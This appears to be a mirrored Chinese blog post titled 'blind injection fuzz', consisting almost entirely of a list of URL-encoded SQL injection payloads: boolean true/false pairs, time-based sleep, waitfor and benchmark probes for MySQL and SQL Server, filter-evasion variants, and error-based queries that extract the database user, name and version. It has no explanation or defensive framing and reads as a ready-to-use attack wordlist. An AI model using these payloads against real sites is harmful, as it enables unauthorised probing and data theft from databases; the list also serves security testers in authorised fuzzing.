zoukankan      html  css  js  c++  java

  • 盲注fuzz


    '
    "
    %df'
    %df"
    and%201=1
    and%201=2
    '%20and%20'1'='1
    '%20and%20'1'='2
    "%20and%20"1"="1
    "%20and%20"1"="2
    )%20and%20(1=1
    )%20and%20(1=2
    ')%20and%20('1'='1
    ')%20and%20('1'='2
    %'%20and%201=1%20and%20'%'='
    %'%20and%201=2%20and%20'%'='x
    %')%20and%201=1%20and%20('%'='
    %')%20and%201=2%20and%20('%'='x
    OR%201=1
    OR%201=2
    '%20OR%201=1--%20-
    '%20OR%201=2--%20-
    )%20OR%201=1--%20-
    )%20OR%201=2--%20-
    ')%20OR%201=1--%20-
    ')%20OR%201=2--%20-
    "%20OR%20"1"="1
    "%20OR%20"1"="2
    '%20OR%20'1'='1
    '%20OR%20'1'='2
    )%20OR%20(1=1
    )%20OR%20(1=2
    ')%20OR%20('1'='1
    ')%20OR%20('1'='2
    (case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
    (case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
    ,(1-(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end))
    ,(1-(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end))
    ,1=if((1=1),1,(select%201%20union%20select%202))
    ,1=if((1=2),1,(select%201%20union%20select%202))
    ,If((1=1),1,(select%201%20union%20select%202))--%20-
    ,If((1=2),1,(select%201%20union%20select%202))--%20-
    ,If((1=1),sleep(4),(select%201%20union%20select%202))--%20-
    -IF((1=1),1,(SELECT%201%20UNION%20SELECT%202))--%20-
    -IF((1=2),1,(SELECT%201%20UNION%20SELECT%202))--%20-
    -(case%20when(1=1)%20then%201%20else%20(select%201%20union%20select%202)%20end)
    -(case%20when(1=2)%20then%201%20else%20(select%201%20union%20select%202)%20end)
    '%2b(if((1=1%20and%20sleep(4)),1,(select%201%20union%20select%202)))%2b'a
    -IF((1=1),sleep(4),(SELECT%201%20UNION%20SELECT%202))--%20-
    ';(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
    ;SELECT%20sleep(4)
    );SELECT%20sleep(4)--%20-
    ;SELECT%20sleep(4)--%20-
    ;(SELECT%201%20FROM(SELECT(sleep(4)))lWuP)--%20-
    '%20AND%20SLEEP(4)%23
    AND%20sleep(4)
    '%20AND%20sleep(4)%20AND%20'1'='1
    ')%20AND%20sleep(4)%20AND%20('1'='1
    )%20AND%20sleep(4)%20AND%20(1=1
    "%20AND%20sleep(4)%20AND%20"1"="
    ')%20and%20(select(0)from(select(sleep(4)))x)--%20-
    and%20(select(0)from(select(sleep(4)))x)
    and%20(select(0)from(select(sleep(4)))x)%20and%201=1
    '%20and%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
    "%20and%20(select(0)from(select(sleep(4)))x)%20and%20"1"="1
    )%20and%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
    ')%20and%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
    rlike%20(select(0)from(select(sleep(4)))x)%20and%201=1
    '%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20'1'='1
    )%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20(1=1
    ')%20rlike%20(select(0)from(select(sleep(4)))x)%20and%20('1'='1
    ;waitfor%20delay%20'0:0:4'%20--%20-
    ';waitfor%20delay%20'0:0:4'%20--%20-
    );waitfor%20delay%20'0:0:4'%20--%20-
    ');waitfor%20delay%20'0:0:4'%20--%20-
    if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
    (SELECT%20*%20FROM(SELECT(sleep(4)))lWuP)
    procedure%20analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)
    xor%201=2
    xor%202=2
    %2527%20%20%20%20%20%20%20
    %0A%09UNION%0CSELECT%A0NULL%20%23
    UNION%20SELECT%20/*!50000%205,null;%00*//*!40000%204,null--%20,*//*!30000%203,null--%20x*/0,null--+
    ''%20or%20(select%201%20from%20(select%20count(*),concat((SELECT%20concat(user(),0x7c,database(),0x7c,version())),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)k)%23
    ''%20or%20updatexml(1,concat(0x7e,(database())),0)%20
  • 相关阅读:
    20160130.CCPP体系详解(0009天)
    20160129.CCPP体系详解(0008天)
    20160128.CCPP体系详解(0007天)
    20160127.CCPP体系详解(0006天)
    20160126.CCPP体系详解(0005天)
    程序员_你的“强迫症”有哪些?
    天天写业务代码_如何成为技术大牛?
    阿里云全球首批MVP李文毅专访-一个“改邪归正”的90后
    【毕业季】穿越回毕业前一年_这次你会怎么选
    恢复Hyper-V虚拟机丢失的数据文件过程
  • 原文地址:https://www.cnblogs.com/Sumarua/p/11699214.html
Copyright © 2011-2022 走看看